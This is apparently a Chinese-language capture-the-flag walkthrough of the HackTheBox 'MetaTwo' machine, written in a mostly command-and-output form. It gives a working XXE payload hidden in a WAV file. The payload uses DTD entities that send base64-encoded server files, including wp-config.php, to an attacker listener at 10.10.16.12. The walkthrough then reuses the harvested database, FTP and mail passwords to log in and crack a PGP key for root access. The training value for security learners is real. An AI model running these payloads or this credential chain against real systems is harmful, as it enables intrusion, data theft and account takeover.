systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:109::/nonexistent:/usr/sbin/nologin sshd:x:104:65534::/run/sshd:/usr/sbin/nologin jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin ftp:x:107:65534::/srv/ftp:/usr/sbin/nologibgo
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
jnelson❌1000:1000:jnelson,:/home/jnelson:/bin/bash
任意文件读取
wp-config.php作为WordPress的配置文件
wp-config.php文件位于该网站的“根目录”中
您的WordPress数据库MySQL连接设置
WordPress盐和键
WordPress数据库表前缀
ABSPATH(WordPress目录的绝对路径)
WordPress调试模式(可选)
- 1
- 2
- 3
- 4
- 5
1.查看nginx的配置文件
修改123.dtd文件去查看nginx的配置文件
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/nginx/nginx.conf">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.12:12344/?p=%file;'>" >
- 1
- 2
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.16.12:12344/123.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
- 1
发现nginx配置的有默认站点
/etc/nginx/sites-enabled/
user www-data; worker_processes auto; pid /run/nginx.pid; include /etc/nginx/modules-enabled/*.conf; events { worker_connections 768; # multi_accept on; } http { ## # Basic Settings ## sendfile on; tcp_nopush on; types_hash_max_size 2048; # server_tokens off; # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # SSL Settings ## ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE ssl_prefer_server_ciphers on; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; ## # Gzip Settings ## gzip on; # gzip_vary on; # gzip_proxied any; # gzip_comp_level 6; # gzip_buffers 16 8k; # gzip_http_version 1.1; # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript; ## # Virtual Host Configs ##主机的 include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; } #mail { # # See sample authentication script at: # # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript # # # auth_http localhost/auth.php; # # pop3_capabilities "TOP" "USER"; # # imap_capabilities "IMAP4rev1" "UIDPLUS"; # # server { # listen localhost:110; # protocol pop3; # proxy on; # } # # server { # listen localhost:143; # protocol imap; # proxy on; # } #}Cg
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
可以去读取/etc/nginx/sites-enabled/default 文件为默认可用站点的配置文件
2.获取网站目录
查看/etc/nginx/sites-enabled/default获取网站的目录
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/nginx/sites-enabled/default">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.12:12344/?p=%file;'>" >
- 1
- 2
┌──(kali㉿kali)-[~/tools/htb/metatwo] └─$ echo -en 'c2VydmVyIHsKCglsaXN0ZW4gODA7CglsaXN0ZW4gWzo6XTo4MDsKCglyb290IC92YXIvd3d3L21ldGFwcmVzcy5odGIvYmxvZzsKCglpbmRleCBpbmRleC5waHAgaW5kZXguaHRtbDsKCiAgICAgICAgaWYgKCRodHRwX2hvc3QgIT0gIm1ldGFwcmVzcy5odGIiKSB7CiAgICAgICAgICAgICAgICByZXdyaXRlIF4gaHR0cDovL21ldGFwcmVzcy5odGIvOwogICAgICAgIH0KCglsb2NhdGlvbiAvIHsKCQl0cnlfZmlsZXMgJHVyaSAkdXJpLyAvaW5kZXgucGhwPyRhcmdzOwoJfQogICAgCglsb2NhdGlvbiB+IFwucGhwJCB7CgkJaW5jbHVkZSBzbmlwcGV0cy9mYXN0Y2dpLXBocC5jb25mOwoJCWZhc3RjZ2lfcGFzcyB1bml4Oi92YXIvcnVuL3BocC9waHA4LjAtZnBtLnNvY2s7Cgl9CgoJbG9jYXRpb24gfiogXC4oanN8Y3NzfHBuZ3xqcGd8anBlZ3xnaWZ8aWNvfHN2ZykkIHsKCQlleHBpcmVzIG1heDsKCQlsb2dfbm90X2ZvdW5kIG9mZjsKCX0KCn0K' | base64 -d server { listen 80; listen [::]:80; root /var/www/metapress.htb/blog; index index.php index.html; if ($http_host != "metapress.htb") { rewrite ^ http://metapress.htb/; } location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/var/run/php/php8.0-fpm.sock; } location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ { expires max; log_not_found off; } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
3.读取网站的配置文件
读取metapress.htb网站的配置文件
/var/www/metapress.htb/blog/wp-config.php
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.12:12344/?p=%file;'>" >
- 1
- 2
┌──(kali㉿kali)-[~/tools/htb/metatwo] └─$ echo -en 'PD9waHANCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICdibG9nJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgdXNlcm5hbWUgKi8NCmRlZmluZSggJ0RCX1VTRVInLCAnYmxvZycgKTsNCg0KLyoqIE15U1FMIGRhdGFiYXNlIHBhc3N3b3JkICovDQpkZWZpbmUoICdEQl9QQVNTV09SRCcsICc2MzVBcUBUZHFyQ3dYRlVaJyApOw0KDQovKiogTXlTUUwgaG9zdG5hbWUgKi8NCmRlZmluZSggJ0RCX0hPU1QnLCAnbG9jYWxob3N0JyApOw0KDQovKiogRGF0YWJhc2UgQ2hhcnNldCB0byB1c2UgaW4gY3JlYXRpbmcgZGF0YWJhc2UgdGFibGVzLiAqLw0KZGVmaW5lKCAnREJfQ0hBUlNFVCcsICd1dGY4bWI0JyApOw0KDQovKiogVGhlIERhdGFiYXNlIENvbGxhdGUgdHlwZS4gRG9uJ3QgY2hhbmdlIHRoaXMgaWYgaW4gZG91YnQuICovDQpkZWZpbmUoICdEQl9DT0xMQVRFJywgJycgKTsNCg0KZGVmaW5lKCAnRlNfTUVUSE9EJywgJ2Z0cGV4dCcgKTsNCmRlZmluZSggJ0ZUUF9VU0VSJywgJ21ldGFwcmVzcy5odGInICk7DQpkZWZpbmUoICdGVFBfUEFTUycsICc5TllTX2lpQEZ5TF9wNU0yTnZKJyApOw0KZGVmaW5lKCAnRlRQX0hPU1QnLCAnZnRwLm1ldGFwcmVzcy5odGInICk7DQpkZWZpbmUoICdGVFBfQkFTRScsICdibG9nLycgKTsNCmRlZmluZSggJ0ZUUF9TU0wnLCBmYWxzZSApOw0KDQovKiojQCsNCiAqIEF1dGhlbnRpY2F0aW9uIFVuaXF1ZSBLZXlzIGFuZCBTYWx0cy4NCiAqIEBzaW5jZSAyLjYuMA0KICovDQpkZWZpbmUoICdBVVRIX0tFWScsICAgICAgICAgJz8hWiR1R08qQTZ4T0U1eCxwd2VQNGkqejttYHwuWjpYQClRUlFGWGtDUnlsN31gclhWRz0zIG4+KzNtPy5CLzonICk7DQpkZWZpbmUoICdTRUNVUkVfQVVUSF9LRVknLCAgJ3gkaSQpYjBdYjFjdXA7NDdgWVZ1YS9KSHElKjhVQTZnXTBid29FVzo5MUVaOWhdcldsVnElSVE2NnBmez1dYSUnICk7DQpkZWZpbmUoICdMT0dHRURfSU5fS0VZJywgICAgJ0orbXhDYVA0ejxnLjZQXnRgeml2PmRkfUVFaSU0OCVKblJxXjJNakZpaXRuIyZuK0hYdl18fEUrRn5De3FLWHknICk7DQpkZWZpbmUoICdOT05DRV9LRVknLCAgICAgICAgJ1NtZURyJCRPMGppO145XSpgfkdOZSFwWEBEdldiNG05RWQ9RGQoLnItcXteeihGPyk3bXhOVWc5ODZ0UU83TzUnICk7DQpkZWZpbmUoICdBVVRIX1NBTFQnLCAgICAgICAgJ1s7VEJnYy8sTSMpZDVmW0gqdGc1MGlmVD9adi41V3g9YGxAdiQtdkgqPH46MF1zfWQ8Jk07Lix4MHp+Uj4zIUQnICk7DQpkZWZpbmUoICdTRUNVUkVfQVVUSF9TQUxUJywgJz5gVkFzNiFHOTU1ZEpzPyRPNHptYC5RO2FtaldedUpya18xLWRJKFNqUk9kV1tTJn5vbWlIXmpWQz8yLUk/SS4nICk7DQpkZWZpbmUoICdMT0dHRURfSU5fU0FMVCcsICAgJzRbZlNeMyE9JT9ISW9wTXBrZ1lib3k4LWpsXmldTXd9WSBkfk49Jl5Kc0lgTSlGSlRKRVZJKSBOI05PaWRJZj0nICk7DQpkZWZpbmUoICdOT05DRV9TQUxUJywgICAgICAgJy5zVSZDUUBJUmxoIE87NWFzbFkrRnE4UVdoZVNOeGQ2VmUjfXchQnEsaH1WOWpLU2tUR3N2JVk0NTFGOEw9YkwnICk7DQoNCi8qKg0KICogV29yZFByZXNzIERhdGFiYXNlIFRhYmxlIHByZWZpeC4NCiAqLw0KJHRhYmxlX3ByZWZpeCA9ICd3cF8nOw0KDQovKioNCiAqIEZvciBkZXZlbG9wZXJzOiBXb3JkUHJlc3MgZGVidWdnaW5nIG1vZGUuDQogKiBAbGluayBodHRwczovL3dvcmRwcmVzcy5vcmcvc3VwcG9ydC9hcnRpY2xlL2RlYnVnZ2luZy1pbi13b3JkcHJlc3MvDQogKi8NCmRlZmluZSggJ1dQX0RFQlVHJywgZmFsc2UgKTsNCg0KLyoqIEFic29sdXRlIHBhdGggdG8gdGhlIFdvcmRQcmVzcyBkaXJlY3RvcnkuICovDQppZiAoICEgZGVmaW5lZCggJ0FCU1BBVEgnICkgKSB7DQoJZGVmaW5lKCAnQUJTUEFUSCcsIF9fRElSX18gLiAnLycgKTsNCn0NCg0KLyoqIFNldHMgdXAgV29yZFByZXNzIHZhcnMgYW5kIGluY2x1ZGVkIGZpbGVzLiAqLw0KcmVxdWlyZV9vbmNlIEFCU1BBVEggLiAnd3Atc2V0dGluZ3MucGhwJzsNCg==' | base64 -d <?php /** The name of the database for WordPress */ define( 'DB_NAME', 'blog' ); /** MySQL database username */ define( 'DB_USER', 'blog' ); /** MySQL database password */ define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); define( 'FS_METHOD', 'ftpext' ); define( 'FTP_USER', 'metapress.htb' ); define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' ); define( 'FTP_HOST', 'ftp.metapress.htb' ); define( 'FTP_BASE', 'blog/' ); define( 'FTP_SSL', false ); /**#@+ * Authentication Unique Keys and Salts. * @since 2.6.0 */ define( 'AUTH_KEY', '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' ); define( 'SECURE_AUTH_KEY', 'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' ); define( 'LOGGED_IN_KEY', 'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' ); define( 'NONCE_KEY', 'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' ); define( 'AUTH_SALT', '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' ); define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' ); define( 'LOGGED_IN_SALT', '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' ); define( 'NONCE_SALT', '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' ); /** * WordPress Database Table prefix. */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
4.获取ftp账户密码
define( ‘FTP_USER’, ‘metapress.htb’ );
define( ‘FTP_PASS’, ‘9NYS_ii@FyL_p5M2NvJ’ );
获取信息
ftp登录
翻找文件
毕竟是靶场两个文件夹
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wRMVmJUF-1668878261021)(https://cdn.nlark.com/yuque/0/2022/png/23025736/1668873665169-d9b8d8a0-70ac-479a-be38-439e125a4660.png#averageHue=%2328313c&clientId=u7ef28874-a7d5-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=75&id=u44c0760a&margin=%5Bobject%20Object%5D&name=image.png&originHeight=94&originWidth=874&originalType=binary&ratio=1&rotation=0&showTitle=false&size=14921&status=done&style=none&taskId=ub25de5fd-f3d5-41c8-9af4-73ae687ecfa&title=&width=699.2)]
还是去查看邮件的里边可能有敏感信息,第一个有可能是博客的备份文件,blog文件夹下载查看了几个文件的确是网站的源码备份
mailer文件夹
查看发送的电子邮件
get send_email.php
┌──(kali㉿kali)-[~/tools/htb/metatwo] └─$ cat send_email.php <?php /* * This script will be used to send an email to all our users when ready for launch */ use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; require 'PHPMailer/src/Exception.php'; require 'PHPMailer/src/PHPMailer.php'; require 'PHPMailer/src/SMTP.php'; $mail = new PHPMailer(true); $mail->SMTPDebug = 3; $mail->isSMTP(); $mail->Host = "mail.metapress.htb"; $mail->SMTPAuth = true; $mail->Username = "jnelson@metapress.htb"; $mail->Password = "Cb4_JmWM8zUZWMu@Ys"; $mail->SMTPSecure = "tls"; $mail->Port = 587; $mail->From = "jnelson@metapress.htb"; $mail->FromName = "James Nelson"; $mail->addAddress("info@metapress.htb"); $mail->isHTML(true); $mail->Subject = "Startup"; $mail->Body = "<i>We just started our new blog metapress.htb!</i>"; try { $mail->send(); echo "Message has been sent successfully"; } catch (Exception $e) { echo "Mailer Error: " . $mail->ErrorInfo; }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
获取账户
jnelson
Cb4_JmWM8zUZWMu@Ys
提权
尝试ssh
获取了user.txt文件
注意到passpie去查看资料是一个基于命令行的密码管理器
jnelson@meta2:~$ cd .passpie/ jnelson@meta2:~/.passpie$ ls -al total 24 dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 . drwxr-xr-x 4 jnelson jnelson 4096 Nov 19 15:38 .. -r-xr-x--- 1 jnelson jnelson 3 Jun 26 13:57 .config -r-xr-x--- 1 jnelson jnelson 5243 Jun 26 13:58 .keys dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 12:52 ssh jnelson@meta2:~/.passpie$ cd ssh jnelson@meta2:~/.passpie/ssh$ ls jnelson.pass root.pass jnelson@meta2:~/.passpie/ssh$ cat root.pass comment: '' fullname: root@ssh login: root modified: 2022-06-26 08:58:15.621572 name: ssh password: '-----BEGIN PGP MESSAGE----- hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2 nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr lpF0RatbxQGWBks5F3o= =uh1B -----END PGP MESSAGE----- '
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
.config文件没有东西,.keys文件包含两个加密的钥匙
jnelson@meta2:~/.passpie$ cat .keys -----BEGIN PGP PUBLIC KEY BLOCK----- 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 fo6KI+w2uXLaw+bIT1XZurDN =dqsF -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP PRIVATE KEY BLOCK----- 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 =7Uo6 -----END PGP PRIVATE KEY BLOCK-----
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
发现使用txt格式john识别错误加密格式
先用gpg2john将keys文件转换为john可爆破的格式,然后用john爆破
gpg2john keys.txt > hash
┌──(root㉿kali)-[/home/kali/tools/htb/metatwo]
└─# john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
